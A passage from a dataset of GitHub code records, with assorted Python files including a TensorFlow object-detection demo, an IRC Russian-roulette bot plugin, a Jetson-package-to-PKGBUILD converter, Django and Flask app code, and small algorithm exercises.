matplotlib import pyplot as plt\r\nfrom PIL import Image\r\nfrom IPython.display import display\r\n\r\n# These are the libraries which we need to import to use this Object Detection API given by Tensorflow (set the path of the object_detection folder correctly):\r\n\r\nfrom object_detection.utils import ops as utils_ops\r\nfrom object_detection.utils import label_map_util\r\nfrom object_detection.utils import visualization_utils as vis_util\r\n\r\n \r\nwhile \"models\" in pathlib.Path.cwd().parts:\r\n os.chdir('..')\r\n\r\n# We have created a function loading_model to load the model and save it on the system:\r\n\r\ndef loading_model(model_name):\r\n base_url = 'http://download.tensorflow.org/models/object_detection/'\r\n model_file = model_name + '.tar.gz'\r\n model_dir = tf.keras.utils.get_file(\r\n fname=model_name, \r\n origin=base_url + model_file,\r\n untar=True)\r\n \r\n model_dir = pathlib.Path(model_dir)/\"saved_model\"\r\n \r\n model = tf.saved_model.load(str(model_dir))\r\n \r\n return model\r\n\r\n# set the path of the label file and load label map data (for plotting):\r\nlabels_path = 'models/research/object_detection/data/mscoco_label_map.pbtxt'\r\ncategory_index = label_map_util.create_category_index_from_labelmap(labels_path , use_display_name=True)\r\n\r\n\r\n### To download labels manually:\r\n# def downloading_labels(filename):\r\n# base_url = 'https://raw.githubusercontent.com/tensorflow/models/master/research/object_detection/data/'\r\n# label_dir = tf.keras.utils.get_file(fname=filename,\r\n# origin=base_url + filename,\r\n# untar=False)\r\n# label_dir = pathlib.Path(label_dir)\r\n# return str(label_dir)\r\n\r\n# label_filename = 'mscoco_label_map.pbtxt'\r\n# labels_path = downloading_labels(label_filename)\r\n\r\n# category_index = label_map_util.create_category_index_from_labelmap(labels_path, use_display_name=True)\r\n\r\n\r\n# Here we load the model (you can choose a model according to your system):\r\n\r\n# select the model and load the model:\r\nmodel = 'ssd_inception_v2_coco_2017_11_17'\r\nmodel = loading_model(model)\r\n\r\n\r\n# Now we will run the model for a single image:\r\n\r\ndef run_model_for_single_image(model,image):\r\n #converting image to array:\r\n image = np.asarray(image)\r\n \r\n #converting the image into tensor(as input should 
be a tensor):\r\n tensor_image = tf.convert_to_tensor(image)\r\n \r\n \r\n tensor_image = tensor_image[tf.newaxis,...]\r\n \r\n # Run model:\r\n model_fn = model.signatures['serving_default']\r\n result_dict = model_fn(tensor_image)\r\n \r\n #detecting\r\n detections = int(result_dict.pop('num_detections'))\r\n result_dict = {key:value[0,:detections].numpy() for key,value in result_dict.items()}\r\n result_dict['num_detections'] = detections\r\n \r\n # convert detection_classes to int\r\n result_dict['detection_classes'] = result_dict['detection_classes'].astype(np.int64)\r\n \r\n \r\n if 'detection_masks' in result_dict:\r\n # we have to set that mask according to the size of image:\r\n modified_detection_masks = utils_ops.reframe_box_masks_to_image_masks(\r\n result_dict['detection_masks'], result_dict['detection_boxes'],\r\n image.shape[0], image.shape[1])\r\n modified_detection_masks = tf.cast(modified_detection_masks > 0.5,tf.uint8)\r\n \r\n result_dict['modified_detection_masks'] = modified_detection_masks.numpy()\r\n \r\n return result_dict\r\n\r\n\r\n\r\n# now we will create a function to show this model:\r\ndef model_show(model, image_path):\r\n image = np.array(Image.open(image_path))\r\n \r\n # Actual detection:\r\n result_dict = run_model_for_single_image(model,image)\r\n \r\n # Visualize the Detection:\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image,\r\n result_dict['detection_boxes'],\r\n result_dict['detection_classes'],\r\n result_dict['detection_scores'],\r\n category_index,\r\n instance_masks=result_dict.get('modified_detection_masks', None),\r\n use_normalized_coordinates=True,\r\n line_thickness=8)\r\n \r\n display(Image.fromarray(image))\r\n\r\n# Set path to test image directory: \r\n\r\ntest_path= pathlib.Path('models/research/object_detection/test_images')\r\ntest_path= sorted(list(test_path.glob(\"*.jpg\")))\r\n\r\n# run model for this test images one by one:\r\n\r\nfor image_path in test_path:\r\n print(image_path)\r\n model_show(model, image_path)\r\n \r\n","repo_name":"SogAniMic/objects_detections-machine-learning","sub_path":"Object_detection_tensorflow.py","file_name":"Object_detection_tensorflow.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74090778291","text":"from django.core.exceptions import ValidationError\nfrom datetime import datetime\n\n\ndef validate_start_date(value):\n print(value)\n start = datetime.strftime(value, '%y-%m-%d')\n current = datetime.strftime(datetime.today(), '%y-%m-%d')\n if start < current:\n raise ValidationError(f\"Start date is incorrect\")\n","repo_name":"d1squit/django_lms","sub_path":"groups/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27619868600","text":"\ndef sort_012(a):\n \"\"\"\n Given an array consisting of only 0, 1, and 2, sort the array in a single traversal\n\n \"\"\"\n low = 0\n mid = 0\n high = len(a) - 1\n\n while mid <= high:\n if a[mid] == 0:\n a[low], a[mid] = a[mid], a[low]\n low += 1\n mid += 1\n elif a[mid] == 1:\n mid += 1\n else:\n a[mid], a[high] = a[high], a[mid]\n high -= 1\n return a\n\n\n# TEST CASE 1\nl1 = [0, 0, 2, 2, 2, 1, 1, 1, 2, 0, 2]\nprint(sort_012(l1))\n# should print [0, 0, 0, 1, 1, 1, 2, 2, 2, 2, 2]\n\n# TEST CASE 2\nl2 = [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2]\nprint(sort_012(l2))\n# should print 
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2]\n\n# TEST CASE 3\nl3 = [0]\nprint(sort_012(l3))\n# should print [0]\n","repo_name":"damclaugh/udacity_data_structures_algorithms","sub_path":"problems_v_algorithms_project/problem_4.py","file_name":"problem_4.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"808372295","text":"# coding=utf-8\nimport random\nfrom system.yaml_loader import *\n\nfrom system.decorators import *\n\nclass plugin(object):\n \"\"\"\n Play russian roulette, the safe way!\n \"\"\"\n\n commands = {\n \"rroulette\": \"play\",\n \"rstats\": \"getstats\",\n \"shoot\": \"shoot\"\n }\n\n hooks = {\n \"connectionLost\": \"save\",\n \"signedOn\": \"load\",\n \"channelJoined\": \"newChannel\"\n }\n\n shoot_guns = [\n [\"shoots {$USER}\", \"Bang!\"],\n [\"torches {$USER}\", \"HMMM MMH MMMPH!\"],\n [\"fills {$USER} with bulletholes\", \"RAT-A-TAT-TAT!\"],\n [\"throws a monitor at {$USER}\", \"HAAAAAAX!\"],\n [\"touches {$USER} in the back with a knife. Hard.\", \"That bot is a spah!\"],\n [\"releases the hounds on {$USER}\", \"Excellent...\"],\n [\"points a magic wand at {$USER}\", \"EXPELLIARMOUS!\"],\n [\"Eeee...\", \"...nope.\"],\n [\"throws a stick of dynamite at {$USER}\", \"BOOOM!\"],\n [\"throws Sascha at {$USER}\", \"NOBODY TOUCHES MY GUN!\"],\n [\"throws a bowling ball at {$USER}\", \"Hey! Cousin! Want to go bowling?\"],\n [\"sets {$USER} as the bomb\", \"All your kicks are belong to us\"],\n [\"fires the lazor at {$USER}\", \"BLAAAAAAAAAAAAAAAAARGGHHH!\"],\n [\"fires the trolling ray at {$USER}\", \"TROLOLOLOLOL\"],\n [\"rickrolls {$USER}\", \"NEVER GONNA GIVE YOU UP, NEVER GONNA LET YOU DOWN\"],\n [\"places a \\\"kick me\\\" sign next to {$USER}\", \"The sign told me to!\"],\n [\"hears whispering..\", \"The voices told me to!\"],\n [\"stares at {$USER}\", \"I don't like your face.\"],\n [\"...\", \"Do I even need a reason?\"],\n [\"saps {$USER}'s sentry\", \"Sentry down!\"],\n [\"hits {$USER} in the head with a baseball\", \"Bonk!\"],\n [\"ponies {$USER}\", \"Kicking is magic!\"],\n [\"tags {$USER} as NSFW\", \"No NSFW content allowed here!\"],\n [\"gives {$USER} a bad rating on Metacritic\", \"Your game is bad and you should FEEL bad\"],\n [\"dances\", \"Do the safety dance, dammit!\"],\n [\"stares into {$USER}'s soul\", \"You have a dirty, DIRTY soul.\"],\n [\"becomes a zombie and eats {$USER}\", \"Braaaaaaaaainnnnsssss...\"],\n [\"runs over {$USER}\", \"HEY, WATCH WHERE YOU'RE GOING!\"],\n [\"{$NICK} {$NICK} {$NICK}\", \"{$NICK}\"],\n [\"{$USER} {$USER}\", \"{$USER}\"],\n [\"catches {$USER} in a pokeball\", \"Gotta catch 'em all!\"],\n [\"headshots {$USER}\", \"Thanks for standin' still, wanker!\"],\n [\"shoots {$USER}\", \"Dying is easy.. Here, let me show you.\"],\n [\"smacks {$USER} with a frying pan\", \"Demopan?\"],\n [\"terminates {$USER}\", \"Get to de choppa!\"],\n [\"applies DRM to {$USER}\", \"Error 37\"],\n [\"spleefs {$USER}\", \"AHAHHAHAHAH LAAAVAAA HAAHAHAHAA HAHAAHAHAA.. Haa.. *cough*\"],\n [\"starts talking in third person\", \"{$NICK} kicked {$USER} from {$CHANNEL} (Kickception!)\"],\n [\"makes {$USER} uncool\", \"{$CHANNEL} is too cool for you!\"],\n [\"roj4kwegrajeskrguaiyrgueargaueyirgairgayhr!\", \"AY, MACARENA!\"],\n [\"steals {$USER}'s face\", \"Your face will make a fine skirt. 
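+# Because sort_012 above only ever sees the values 0, 1 and 2, a two-pass
+# counting version gives the same output; the original single-pass loop is the
+# classic Dutch national flag partition (sketch, illustrative name):
+def sort_012_by_counting(a):
+    counts = [0, 0, 0]
+    for v in a:
+        counts[v] += 1
+    return [0] * counts[0] + [1] * counts[1] + [2] * counts[2]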
~_~\"],\n [\"clubs {$USER} over the head with a rubber mallet\", \"BOOOOOOOOOING!\"]\n ]\n\n def __init__(self, irc):\n self.irc = irc\n# self.guns_handler = yaml_loader(True, \"rroulette\")\n self.stats_handler = yaml_loader(True, \"rroulette\")\n# self.guns = self.guns_handler.load(\"guns\", {\"guns\": []})[\"guns\"]\n self.stats = self.stats_handler.load(\"stats\")\n\n self.channels = {}\n self.users = {}\n\n self.help = {\n \"rroulette\": \"Bite the bullet.. or not?\\nUsage: %srroulette\" % self.irc.control_char,\n \"shoot\": \"Shoot someone.\\n\" +\n (\"Usage: %sshoot [:channel]\\n\" % self.irc.control_char) +\n \"NOTE: If opped and you are a voice or higher, this will kick the user.\",\n \"rstats\": \"Get stats about people and channels using this plugin.\\n\" +\n \"Usage: \" + self.irc.control_char + \"rstats [stat]\\n\" +\n \"Valid stats: all, shots, deaths, players (Channel only), chambers (Channel only), games (User only)\\n\" +\n \"NOTE: If no stat is included, all stats will be returned.\"\n }\n\n def newChannel(self, data):\n channel = data[\"channel\"]\n element = channel\n\n if element not in self.channels.keys():\n players = []\n curplayers = []\n shots = 0\n deaths = 0\n chambers = 6\n\n data = {\"players\": players, \"shots\": shots, \"deaths\": deaths, \"chambers\": chambers,\n \"curplayers\": curplayers}\n\n self.channels[element] = data\n\n def load(self):\n# self.guns = self.guns_handler.load(\"guns\")[\"guns\"]\n self.stats = self.stats_handler.load(\"stats\")\n\n if self.stats:\n if self.stats[\"channels\"]:\n for element in self.stats[\"channels\"].keys():\n data = self.stats[\"channels\"][element]\n self.channels[element] = data\n\n if self.stats[\"users\"]:\n for element in self.stats[\"users\"].keys():\n data = self.stats[\"users\"][element]\n self.users[element] = data\n\n for element in self.irc.channels:\n channel = element\n if channel not in self.channels.keys():\n players = []\n curplayers = []\n shots = 0\n deaths = 0\n chambers = 6\n\n data = {\"players\": players, \"shots\": shots, \"deaths\": deaths, \"chambers\": chambers,\n \"curplayers\": curplayers}\n\n self.channels[channel] = data\n\n for user in self.irc.chanlist[element].keys():\n if user not in self.users.keys():\n games = 0\n shots = 0\n deaths = 0\n\n stuff = {\"games\": games, \"shots\": shots, \"deaths\": deaths}\n self.users[user] = stuff\n\n def save(self, data=None):\n stuff = {\"channels\": self.channels, \"users\": self.users}\n self.stats_handler.save_data(\"stats\", stuff)\n\n def getstats(self, user, channel, arguments):\n if len(arguments) > 2:\n type = arguments[1]\n about = arguments[2]\n stat = \"all\"\n if len(arguments) > 3:\n stat = arguments[3]\n possible_stats = [\"all\", \"shots\", \"deaths\", \"players\", \"games\", \"chambers\"]\n possible_types = [\"user\", \"channel\"]\n if type not in possible_types:\n self.irc.sendnotice(user, \"Invalid type: %s - See %shelp rstats\" % (type, self.irc.control_char))\n elif stat not in possible_stats:\n self.irc.sendnotice(user, \"Invalid stat: %s - See %shelp rstats\" % (stat, self.irc.control_char))\n elif stat in [\"players\", \"chambers\"] and type == \"user\":\n self.irc.sendnotice(user, \"Invalid stat (%s) for type (%s) - See %shelp rstats\" % (stat, type, self.irc.control_char))\n elif stat == \"deaths\" and type == \"channel\":\n self.irc.sendnotice(user, \"Invalid stat (%s) for type (%s) - See %shelp rstats\" % (stat, type, self.irc.control_char))\n else:\n if stat == \"shots\":\n if type == \"channel\":\n if about in 
self.channels.keys():\n self.irc.sendnotice(user, \"Shots in %s: %s\" % (about, self.channels[about][\"shots\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Shots fired for %s: %s\" % (about, self.users[about][\"shots\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"deaths\":\n if type == \"channel\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Deaths in %s: %s\" % (about, self.channels[about][\"deaths\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Deaths for %s: %s\" % (about, self.users[about][\"deaths\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"players\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Total players in %s: %s\" % (about, len(self.channels[about][\"players\"])))\n if len(self.channels[about][\"curplayers\"]) > 0:\n self.irc.sendnotice(user, \"Current players in %s: (%s) %s\" % (about, len(self.channels[about][\"curplayers\"]), \", \".join(self.channels[about][\"curplayers\"])))\n else:\n self.irc.sendnotice(user, \"Nobody is currently playing in %s\" % about)\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"chambers\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Chambers remaining for %s: %s\" % (about, self.channels[about][\"chambers\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"games\":\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Games %s has played in: %s\" % (about, self.users[about][\"games\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n elif stat == \"all\":\n if type == \"channel\":\n if about in self.channels.keys():\n self.irc.sendnotice(user, \"Listing all stats for %s\" % about)\n self.irc.sendnotice(user, \"Shots in %s: %s\" % (about, self.channels[about][\"shots\"]))\n self.irc.sendnotice(user, \"Deaths in %s: %s\" % (about, self.channels[about][\"deaths\"]))\n self.irc.sendnotice(user, \"Total players in %s: %s\" % (about, len(self.channels[about][\"players\"])))\n self.irc.sendnotice(user, \"Chambers remaining for %s: %s\" % (about, self.channels[about][\"chambers\"]))\n if len(self.channels[about][\"curplayers\"]) > 0:\n self.irc.sendnotice(user, \"Current players in %s: (%s) %s\" % (about, len(self.channels[about][\"curplayers\"]), \", \".join(self.channels[about][\"curplayers\"])))\n else:\n self.irc.sendnotice(user, \"Nobody is currently playing in %s\" % about)\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n if about in self.users.keys():\n self.irc.sendnotice(user, \"Listing all stats for %s\" % about)\n self.irc.sendnotice(user, \"Shots fired for %s: %s\" % (about, self.users[about][\"shots\"]))\n self.irc.sendnotice(user, \"Deaths for %s: %s\" % (about, self.users[about][\"deaths\"]))\n self.irc.sendnotice(user, \"Games %s has played in: %s\" % (about, self.users[about][\"games\"]))\n else:\n self.irc.sendnotice(user, \"There is no information for %s\" % about)\n else:\n self.irc.sendnotice(user, \"Usage: %srstats [stat]\" % self.irc.control_char)\n\n def shoot(self, user, channel, arguments):\n if len(arguments) > 1:\n target = arguments[1]\n target_user = 
arguments[1]\n target_channel = channel\n if \":\" in target:\n target_user = target.split(\":\", 1)[0]\n target_channel = target.split(\":\", 1)[1]\n if target_user.lower() == self.irc.nickname.lower():\n self.irc.send_raw(\"PRIVMSG \" + target_channel + \" :\" + self.irc.ctcp + \"ACTION shouts \\\"BANG!\\\" then plays dead\" + self.irc.ctcp)\n return\n curgun = random.choice(self.shoot_guns)\n mstring = \"\" + curgun[0].replace(\"{$USER}\", target).replace(\"{$NICK}\", self.irc.nickname).replace(\"{$CHANNEL}\", channel)\n kstring = curgun[1].replace(\"{$USER}\", target).replace(\"{$NICK}\", self.irc.nickname).replace(\"{$CHANNEL}\", channel)\n self.irc.send_raw(\"PRIVMSG \" + target_channel + \" :\" + self.irc.ctcp + \"ACTION \" + mstring + self.irc.ctcp)\n if (self.irc.is_op(target_channel, user) or user in self.irc.authorized.keys()) and self.irc.is_op(channel, self.irc.nickname):\n self.irc.send_raw(\"KICK %s %s :%s\" % (target_channel, target_user, kstring))\n else:\n self.irc.send_raw(\"PRIVMSG %s :%s\" % (target_channel, kstring))\n\n def play(self, user, channel, arguments):\n chambers_left = self.channels[channel][\"chambers\"]\n\n if user not in self.users.keys():\n games = 0\n shots = 0\n deaths = 0\n\n stuff = {\"games\": games, \"shots\": shots, \"deaths\": deaths}\n self.users[user] = stuff\n\n if user not in self.channels[channel][\"players\"]:\n self.channels[channel][\"players\"].append(user)\n\n if user not in self.channels[channel][\"curplayers\"]:\n self.channels[channel][\"curplayers\"].append(user)\n self.users[user][\"games\"] += 1\n\n self.users[user][\"shots\"] += 1\n self.channels[channel][\"shots\"] += 1\n random.seed()\n\n if random.randint(1, chambers_left) == 1:\n #BANG\n if self.irc.is_op(channel, self.irc.nickname):\n self.irc.send_raw(\"KICK %s %s :Bang!\" % (channel, user))\n else:\n self.irc.send_raw(\"PRIVMSG \" + channel +\" :BANG\")\n self.irc.send_raw(\"PRIVMSG \" + channel + \" :\" + self.irc.ctcp + \"ACTION reloads the gun\" + self.irc.ctcp)\n chambers_left = 6\n self.irc.send_raw(\n \"PRIVMSG \" + channel + \" :\" + 'There are %s new chambers. You have a %s%% chance of dying.' % (\n chambers_left, int(100.0 / chambers_left)))\n\n self.users[user][\"deaths\"] += 1\n self.channels[channel][\"curplayers\"] = []\n self.channels[channel][\"deaths\"] += 1\n else:\n #click\n chambers_left -= 1\n self.irc.sendmsg(channel,\n '*click* You\\'re safe for now. There are %s chambers left. You have a %s%% chance of dying.' 
% (\n chambers_left, int(100.0 / chambers_left)))\n self.channels[channel][\"chambers\"] = chambers_left\n self.save()\n\n name = \"Russian Roulette\"\n","repo_name":"UltrosBot/McBlockit---Helpbot","sub_path":"legacy/plugins/russianroulette.py","file_name":"russianroulette.py","file_ext":"py","file_size_in_byte":15401,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"12272014340","text":"#!/usr/bin/env python3\nimport requests\nimport re\nimport os\nimport subprocess\n\nrepo_overview = 'https://repo.download.nvidia.com/jetson/'\n\nr = requests.get(repo_overview)\nsrc = str(r.content)\ni_until = src.find('')\nsrc = src[:i_until]\ndebs = re.findall(r'https:\\/\\/repo\\S+?deb', src)\n\npkg_list = []\nprev_name = ''\nfor deb_url in debs:\n tag = None\n if 'jetson/t210' in deb_url:\n tag = 't210'\n if 'jetson/common' in deb_url:\n tag = 'common'\n if not tag:\n continue\n\n last = deb_url.rfind('/')\n deb_name = deb_url[last+1:]\n name, ver, arch = deb_name.split('_')\n arch = arch[:-4]\n if arch == 'arm64':\n arch = 'aarch64'\n t = (name, ver, arch, tag, deb_url)\n if name == prev_name:\n pkg_list.pop()\n prev_name = name\n pkg_list.append(t)\n\nprint(pkg_list)\n\nname_set = set()\nfor t in pkg_list:\n name_set.add(t[0])\n\ncwd = os.getcwd()\nfor name, ver, arch, tag, deb_url in pkg_list:\n last = deb_url.rfind('/')\n deb_name = deb_url[last+1:]\n\n os.chdir(cwd)\n os.system(f'mkdir -p {name}')\n os.chdir(cwd + '/' + name)\n\n if not os.path.isfile('control'):\n os.system(f'wget -nc {deb_url}')\n os.system(f'bsdtar -xf {deb_name}')\n os.system(f'tar xvf control.tar*')\n\n pkgdesc = ''\n depends = ''\n with open('control') as f:\n fls = f.read().splitlines()\n for fl in fls:\n if fl.startswith('Description: '):\n pkgdesc = fl[13:]\n elif fl.startswith('Depends:'):\n colon_i = fl.find(':')\n deps = fl[colon_i+1:].strip()\n deps = deps.split(',')\n for dep in deps:\n dep = dep.strip()\n i_space = dep.find(' ')\n dep_name = dep[:i_space]\n if dep_name in name_set:\n dep_ver = dep[i_space:]\n dep_ver = dep_ver.replace(' ', '').replace('(', '').replace(')','').replace('-', '_')\n depends += f\"'{dep_name}{dep_ver}' \"\n\n checksum = subprocess.check_output(f'sha256sum -b {deb_name}', cwd=os.getcwd(), shell=True, text=True)\n checksum = checksum.split()[0]\n\n ver_ = ver.replace('-', '_')\n head = f\"\"\"pkgname={name}\npkgver={ver_}\npkgrel=1\npkgdesc='{pkgdesc}'\narch=({arch})\nurl='https://repo.download.nvidia.com/jetson/'\nlicense=('custom')\ndepends=({depends})\nsource=('{deb_url}')\nsha256sums=('{checksum}')\n\"\"\"\n \n tail = \"\"\"\nprepare() {\n mkdir -p root\n tar xvf data.tar* -C root\n}\n\npackage() {\n cp -a root/. $pkgdir/\n\n # On Arch, /lib is symlink to /usr/lib\n if test -d $pkgdir/lib; then\n cp -a $pkgdir/lib/. $pkgdir/usr/lib/\n rm -rf $pkgdir/lib\n fi\n\n # On Arch, sbin is a symlink to bin\n if test -d $pkgdir/usr/sbin; then\n cp -a $pkgdir/usr/sbin/. $pkgdir/usr/bin/\n rm -rf $pkgdir/usr/sbin\n fi\n\n # Arch on ARM doesn't use multilib\n if test -d $pkgdir/lib/aarch64-linux-gnu; then\n cp -a $pkgdir/lib/aarch64-linux-gnu/. $pkgdir/lib/\n rm -rf $pkgdir/lib/aarch64-linux-gnu\n fi\n if test -d $pkgdir/usr/lib/aarch64-linux-gnu; then\n cp -a $pkgdir/usr/lib/aarch64-linux-gnu/. 
$pkgdir/usr/lib/\n rm -rf $pkgdir/usr/lib/aarch64-linux-gnu\n fi\n}\n\"\"\"\n if not os.path.isfile('TAIL'):\n with open('TAIL', 'w') as f:\n f.write(tail)\n else:\n with open('TAIL') as f:\n tail = f.read()\n\n print(head)\n with open('PKGBUILD', 'w') as f:\n f.write(head)\n f.write(tail)\n","repo_name":"cyj0912/alarm-aur","sub_path":"l4t_updater.py","file_name":"l4t_updater.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70809594614","text":"#!/usr/bin/python3\n\"\"\"Place-Amenity view module\"\"\"\n\nfrom flask import jsonify, abort, request\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.amenity import Amenity\nfrom models.place import Place\n\n\n@app_views.route('/places//amenities', methods=['GET'], strict_slashes=False)\ndef get_place_amenities(place_id):\n \"\"\"Retrieves the list of all Amenity objects of a Place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n amenities = [amenity.to_dict() for amenity in place.amenities]\n return jsonify(amenities)\n\n\n\n@app_views.route('/places//amenities/', methods=['DELETE'], strict_slashes=False)\ndef delete_place_amenity(place_id, amenity_id):\n \"\"\"Deletes a Amenity object from a Place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n amenity = storage.get(Amenity, amenity_id)\n if not amenity:\n abort(404)\n if amenity not in place.amenities:\n abort(404)\n place.amenities.remove(amenity)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/places//amenities/', methods=['POST'], strict_slashes=False)\ndef link_place_amenity(place_id, amenity_id):\n \"\"\"Links a Amenity object to a Place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n amenity = storage.get(Amenity, amenity_id)\n if not amenity:\n abort(404)\n if amenity in place.amenities:\n return jsonify(amenity.to_dict()), 200\n place.amenities.append(amenity)\n storage.save()\n return jsonify(amenity.to_dict()), 201\n\n","repo_name":"IntrovertedTechie/AirBnB_clone_v3","sub_path":"api/v1/views/places_amenities.py","file_name":"places_amenities.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17357790208","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport shutil\n\nimport gnupg\nfrom apps.split_logs.models import CourseDump\nfrom apps.split_logs.models import CourseDumpTable\nfrom apps.split_logs.models import Organisation\nfrom apps.split_logs.sms_command import SMSCommand\nfrom apps.split_logs.utils import s3_upload_file\nfrom django.conf import settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(SMSCommand):\n help = \"Course DB encrypt files\"\n\n def handle(self, *args, **options):\n self.setOptions(**options)\n\n gpg = gnupg.GPG()\n gpg.encoding = \"utf-8\"\n organisations = Organisation.objects.filter(\n active=True,\n public_key__isnull=False,\n )\n tables = CourseDumpTable.objects.all()\n for org in organisations:\n logger.info(f\"Process organisation <{org}>\")\n cd = CourseDump.objects.filter(\n course__organisation=org,\n is_encypted=True,\n date=self.now\n )\n if len(cd) == 0:\n logger.warning(\"No course dumps\")\n else:\n courses = org.course_set.filter(active=True)\n if len(cd) == len(courses) * len(tables):\n folder_name = cd[0].dump_folder_name()\n if os.path.isdir(folder_name):\n zip_name = 
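+# The l4t_updater record above shells out to sha256sum for the package checksum;
+# the stdlib can compute the same digest in-process (a sketch under that
+# assumption, helper name illustrative):
+import hashlib
+
+def sha256_of(path, chunk_size=1 << 20):
+    digest = hashlib.sha256()
+    with open(path, 'rb') as f:
+        for block in iter(lambda: f.read(chunk_size), b''):
+            digest.update(block)               # stream the file in 1 MiB chunks
+    return digest.hexdigest()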
shutil.make_archive(\n folder_name,\n \"zip\",\n os.path.dirname(folder_name),\n os.path.basename(folder_name)\n )\n else:\n zip_name = \"{}.zip\".format(folder_name)\n\n if os.path.exists(zip_name):\n bucker_filename = f\"{org.name}/dump-db/{os.path.basename(zip_name)}\"\n logger.info(f\"Upload file <{zip_name}> to <{bucker_filename}>\")\n s3_upload_file(\n org.bucket_name,\n org,\n zip_name,\n bucker_filename,\n )\n\n if os.path.isdir(folder_name):\n # remove original folder\n shutil.rmtree(folder_name)\n else:\n logger.warning(\n f\"Not all tables were dumped/encrypted, please check: organisation <{org.name}>, date=<{self.now}>\"\n )\n","repo_name":"epfl-cede/swissmooc-extras","sub_path":"src/backend/apps/split_logs/management/commands/course_db_upload.py","file_name":"course_db_upload.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16026633124","text":"# Stand in a line (BOJ 1138), Silver 2, implementation, greedy\nfrom sys import stdin\nn = int(stdin.readline())\na = list(map(int,stdin.readline().split()))\nans = [0 for i in range(n)]\nfor i in range(1, n+1):\n tmp = a[i-1]\n cnt = 0\n for j in range(n):\n if cnt == tmp and ans[j] == 0: # I am the smallest of the people still remaining\n ans[j] = i\n break\n elif ans[j] == 0:\n cnt += 1\n\nprint(*ans)","repo_name":"lookinmin/CodingTest","sub_path":"Greedy/BOJ_1138.py","file_name":"BOJ_1138.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"204270923","text":"import torch\nfrom model.conv4d import Conv4d\nimport itertools\nimport model.conv4d\n\n\ndef test_conv4d():\n kernel_size = (1, 1, 1, 1)\n padding = (0, 0, 0, 0)\n stride = (1, 1, 1, 1)\n dilation = (1, 1, 1, 1)\n shape = (Batch, _, l_i, d_i, h_i, w_i) = (10, 5, 8, 12, 40, 80)\n (l_k, d_k, h_k, w_k) = kernel_size\n (l_p, d_p, h_p, w_p) = padding\n (l_d, d_d, h_d, w_d) = dilation\n (l_s, d_s, h_s, w_s) = stride\n l_o = (l_i + 2 * l_p - (l_k) - (l_k - 1) * (l_d - 1)) // l_s + 1\n d_o = (d_i + 2 * d_p - (d_k) - (d_k - 1) * (d_d - 1)) // d_s + 1\n h_o = (h_i + 2 * h_p - (h_k) - (h_k - 1) * (h_d - 1)) // h_s + 1\n w_o = (w_i + 2 * w_p - (w_k) - (w_k - 1) * (w_d - 1)) // w_s + 1\n expect = l_o, d_o, h_o, w_o\n assert expect == tuple(\n itertools.starmap(\n model.conv4d._get_dimension_size,\n zip(shape[2:], kernel_size, padding, dilation, stride),\n )\n )\n","repo_name":"leaver2000/mesoformer","sub_path":"tests/conv4d_test.py","file_name":"conv4d_test.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42698633925","text":"# Advent of Code 2022\n# Day 20\n\nPART_1 = False\nDEBUG = False\nif DEBUG:\n FILE_NAME = 'day20-test.txt'\nelse:\n FILE_NAME = 'day20-input.txt'\n\nif PART_1:\n NUMBER_OF_CYCLES = 1\nelse:\n KEY = 811589153\n NUMBER_OF_CYCLES = 10\n\ndef readFile(name):\n file = open(name, mode = 'r', encoding = 'utf-8-sig')\n lines = file.readlines()\n file.close()\n return lines\n\ndef move(data, src, count):\n element = data.pop(src)\n dst = src + count\n data.insert(dst % len(data), element)\n\n# Read the file.\nlines = readFile(FILE_NAME)\n\noriginal = []\nfor line in lines:\n original.append(int(line))\nsize = len(original)\n\nif DEBUG:\n print(\"Original:\", original, \"size=\", size)\n\nif not PART_1:\n original = [o * KEY for o in original]\n if DEBUG:\n 